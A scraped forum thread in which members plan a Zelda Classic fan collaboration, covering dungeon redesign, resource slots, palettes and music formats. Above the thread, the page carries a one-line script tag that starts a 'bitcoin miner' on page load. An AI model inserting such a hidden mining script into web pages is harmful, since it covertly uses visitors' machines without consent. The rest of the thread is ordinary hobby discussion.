<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

AZCT: A Zelda Classic Thing - Basic Planning Thread

... zelda
User avatar
tenta
Posts: 18
Joined: 9 years ago
First name: Alex
Location: Quebec

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby tenta » 1 year ago

Is this still going? any updates?
Image

User avatar
Nabe
Still working on AZCT
Posts: 125
Joined: 5 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Nabe » 11 months ago

tenta wrote: Is this still going? any updates?
Still going, I promise! But nothing to report.

User avatar
jayScribble
FEEL THE FORCE
Posts: 400
Joined: 5 years ago
Pronouns: it, they, that
Location: Over there

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby jayScribble » 11 months ago

Nabe wrote:
tenta wrote: Is this still going? any updates?
Still going, I promise! But nothing to report.
Well, I'll be waiting until then.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

User avatar
Grounder
Posts: 2295
Joined: 4 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Grounder » 9 months ago

is the dream dead
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

Image

Image

User avatar
Nabe
Still working on AZCT
Posts: 125
Joined: 5 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Nabe » 9 months ago

Grounder wrote: is the dream dead
Nope!

It's just a really delayed dream. In fact, you're having some trouble even getting to sleep in the first place, so you roll over to grab your cellular phone from the nightstand. But you see a ... shape on the ground, out the corner of your eye. It stares at you, as you stare back, too scared to speak, too scared to remain silent. After a time, you roll back into bed, over onto your other side, staring now at the wall opposite. Sleep comes, fleetingly. You dream of the shape, playing a video game.

That game is AZCT, and you can't help but think that it looks pretty neat. But the shape missed a key in the previous room, and that's annoying. Think about popsicles. It's okay. There you go.

Zyglrox Odyssey
Posts: 545
Joined: 5 years ago
Contact:

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Zyglrox Odyssey » 6 months ago

Important question

Should Like-Likes be allowed in talkhaus collabs?
ImageImage
ImageImage
ImageImage
ImageImage

User avatar
jayScribble
FEEL THE FORCE
Posts: 400
Joined: 5 years ago
Pronouns: it, they, that
Location: Over there

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby jayScribble » 6 months ago

Zyglrox Odyssey wrote: Important question

Should Like-Likes be allowed in talkhaus collabs?
In my honest opinion, I allow them if the game does three things with the shield eating ones:
  • Demotes you to a weaker shield if it eats it, as opposed to no shield on Link when it eats it.
  • If it allows high tier shields to be repurchased and at a reasonable price or at a discount if you already have that shield tier unlocked.
  • If the shield shop is at a convenient place, like near the dungeon where shield eating Like-Likes are common.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

User avatar
Nabe
Still working on AZCT
Posts: 125
Joined: 5 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Nabe » 6 months ago

Zyglrox Odyssey wrote: Important question

Should Like-Likes be allowed in talkhaus collabs?
Absolutely! A mysterious and hateful creature, found in some dark corners of the world, vomits up innumerable shields...

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

What's left that needs to be done to get this project finished? What can I help with? I have over a decade of ZC experience and I want to see this get done. Let me know.

User avatar
raekuul
X&BUTT
Posts: 949
Joined: 9 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby raekuul » 4 months ago

Well, I would like someone to replace me with respect to designing Level 6 (dungeon that provides the Lens of Truth as its dungeon item). Right now it's a short sidescrolling dungeon that... doesn't really work well.

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

raekuul wrote: Well, I would like someone to replace me with respect to designing Level 6 (dungeon that provides the Lens of Truth as its dungeon item). Right now it's a short sidescrolling dungeon that... doesn't really work well.
I can do that, I have great ideas for a dungeon that uses that. Can you send me the file and details? Maybe your sidescrolling section can be the cave or path to the dungeon like OoA level 8.

User avatar
raekuul
X&BUTT
Posts: 949
Joined: 9 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby raekuul » 4 months ago

Barring any changes that I missed due to being a practical hermit for the past two years, everything should be in the dropbox folder. Unfortunately I don't remember which username here corresponds to the email that dropbox says is the owner.

User avatar
jayScribble
FEEL THE FORCE
Posts: 400
Joined: 5 years ago
Pronouns: it, they, that
Location: Over there

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby jayScribble » 4 months ago

Awakenyourmind wrote: I can do that, I have great ideas for a dungeon that uses that. Can you send me the file and details? Maybe your sidescrolling section can be the cave or path to the dungeon like OoA level 8.
I have the files here: https://www.dropbox.com/s/qug8apucqk8yn ... s.zip?dl=0

It might be a bit outdated since Nabe has the master copy, but do some changes as you please with this one.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

jayScribble wrote:
Awakenyourmind wrote: I can do that, I have great ideas for a dungeon that uses that. Can you send me the file and details? Maybe your sidescrolling section can be the cave or path to the dungeon like OoA level 8.
I have the files here: https://www.dropbox.com/s/qug8apucqk8yn ... s.zip?dl=0

It might be a bit outdated since Nabe has the master copy, but do some changes as you please with this one.
Perfect, I'll get started on it right away, thanks!

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

Which version of ZC are you guys using? Which tilepage and combo page can I use for custom gfx?
Also which level palette can I use for custom palette?
Last edited by Awakenyourmind on 11 Feb 2018, 22:34, edited 2 times in total.

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

raekuul wrote: Well, I would like someone to replace me with respect to designing Level 6 (dungeon that provides the Lens of Truth as its dungeon item). Right now it's a short sidescrolling dungeon that... doesn't really work well.
Can I completely re design this level?


Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 4 months ago

I can't start this until I know which slots and resources I can use. Does it matter? I really want to help you guys complete this.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 1349
Joined: 5 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Leet » 4 months ago

I feel like Nabe could probably help you.
Nabe wrote:ping
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
jayScribble
FEEL THE FORCE
Posts: 400
Joined: 5 years ago
Pronouns: it, they, that
Location: Over there

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby jayScribble » 3 months ago

Awakenyourmind wrote: I can't start this until I know which slots and resources I can use. Does it matter? I really want to help you guys complete this.
All I know from the resource thread is that Maps 8-10 are claimed for dungeon 6, so you could start from there. Combo 2504-2887 and Enemies e213-220 are also available for use. If there is anything else you want to know about?
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 3 months ago

jayScribble wrote:
Awakenyourmind wrote: I can't start this until I know which slots and resources I can use. Does it matter? I really want to help you guys complete this.
All I know from the resource thread is that Maps 8-10 are claimed for dungeon 6, so you could start from there. Combo 2504-2887 and Enemies e213-220 are also available for use. If there is anything else you want to know about?
Which level palette slot could I use? I'm going to be using custom GB tiles mixed with the classic, so not too new looking-for a classic approach, if that matters. Kind of like the other dungeon I was trying to make for this project.

Edit: Can I use an .spc for the soundtrack or midi only?

Edit2: which version of Zelda classic does this project use? I have 2.50.2 is that fine?

User avatar
jayScribble
FEEL THE FORCE
Posts: 400
Joined: 5 years ago
Pronouns: it, they, that
Location: Over there

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby jayScribble » 3 months ago

Awakenyourmind wrote: Which level palette slot could I use? I'm going to be using custom GB tiles mixed with the classic, so not too new looking-for a classic approach, if that matters. Kind of like the other dungeon I was trying to make for this project.

Edit: Can I use an .spc for the soundtrack or midi only?

Edit2: which version of Zelda classic does this project use? I have 2.50.2 is that fine?
02B-02E is available for the palettes, so you can choose one of those.

Preferably .scp, but MIDI would work as well.

2.50.29 is the one we're using according to the master file, but I don't know about compatibility with 2.50.2.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

User avatar
Nabe
Still working on AZCT
Posts: 125
Joined: 5 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Nabe » 3 months ago

Posts! Ack!
Awakenyourmind wrote:
jayScribble wrote:
Awakenyourmind wrote: I can't start this until I know which slots and resources I can use. Does it matter? I really want to help you guys complete this.
All I know from the resource thread is that Maps 8-10 are claimed for dungeon 6, so you could start from there. Combo 2504-2887 and Enemies e213-220 are also available for use. If there is anything else you want to know about?
Which level palette slot could I use? I'm going to be using custom GB tiles mixed with the classic, so not too new looking-for a classic approach, if that matters. Kind of like the other dungeon I was trying to make for this project.

Edit: Can I use an .spc for the soundtrack or midi only?

Edit2: which version of Zelda classic does this project use? I have 2.50.2 is that fine?
Hey, welcome back! 2.50.2 is fine. A good NSF would be coolest of all, but MIDI or SMC is fine after that.

I don't mind fixing graphics associations down the road in the merge if you've already started with tiles, but somewhere in the range of tilepage 190-199 or after 225 would be ideal.

Awakenyourmind
Muwha!
Posts: 127
Joined: 7 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Awakenyourmind » 3 months ago

Nabe wrote: Posts! Ack!
Awakenyourmind wrote:
jayScribble wrote:
All I know from the resource thread is that Maps 8-10 are claimed for dungeon 6, so you could start from there. Combo 2504-2887 and Enemies e213-220 are also available for use. If there is anything else you want to know about?
Which level palette slot could I use? I'm going to be using custom GB tiles mixed with the classic, so not too new looking-for a classic approach, if that matters. Kind of like the other dungeon I was trying to make for this project.

Edit: Can I use an .spc for the soundtrack or midi only?

Edit2: which version of Zelda classic does this project use? I have 2.50.2 is that fine?
Hey, welcome back! 2.50.2 is fine. A good NSF would be coolest of all, but MIDI or SMC is fine after that.

I don't mind fixing graphics associations down the road in the merge if you've already started with tiles, but somewhere in the range of tilepage 190-199 or after 225 would be ideal.
I started at page 180. If you can fix it like you said that's be great, or I could start over again.

User avatar
Nabe
Still working on AZCT
Posts: 125
Joined: 5 years ago

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby Nabe » 3 months ago

Awakenyourmind wrote:
Nabe wrote: Posts! Ack!
Awakenyourmind wrote: Which level palette slot could I use? I'm going to be using custom GB tiles mixed with the classic, so not too new looking-for a classic approach, if that matters. Kind of like the other dungeon I was trying to make for this project.

Edit: Can I use an .spc for the soundtrack or midi only?

Edit2: which version of Zelda classic does this project use? I have 2.50.2 is that fine?
Hey, welcome back! 2.50.2 is fine. A good NSF would be coolest of all, but MIDI or SMC is fine after that.

I don't mind fixing graphics associations down the road in the merge if you've already started with tiles, but somewhere in the range of tilepage 190-199 or after 225 would be ideal.
I started at page 180. If you can fix it like you said that's be great, or I could start over again.
180-190 is just fine as well.


Return to “AZCT”

Who is online

Users browsing this forum: No registered users and 1 guest

cron